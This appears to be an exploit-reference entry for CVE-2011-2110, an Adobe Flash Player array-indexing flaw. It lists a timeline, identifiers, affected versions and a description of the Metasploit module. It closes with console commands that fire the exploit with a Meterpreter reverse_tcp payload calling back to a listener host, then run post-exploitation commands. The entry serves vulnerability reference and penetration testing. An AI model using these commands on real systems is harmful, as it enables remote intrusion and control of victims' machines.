Timeline :

Vulnerability discovered exploited in the wild
Public release of the vulnerability by the vendor the 2011-06-14
Details of the vulnerability provided the 2011-10-09
Metasploit PoC provided the 2012-06-19

PoC provided by :

mr_me
Unknown

Reference(s) :

CVE-2011-2110
OSVDB-73007
APSB11-18
BID-48268

Affected version(s) :

Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 10.3.185.23 and earlier versions for Android

Tested on Windows XP Pro SP3 with :

Internet Explorer 8
Adobe Flash Player 10.3.181.23

Description :

This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for attacks against Korean based organizations. Specifically, this issue occurs when indexing an array using an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and is very reliable.

Commands :

use exploit/windows/browser/adobe_flashplayer_arrayindexing
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid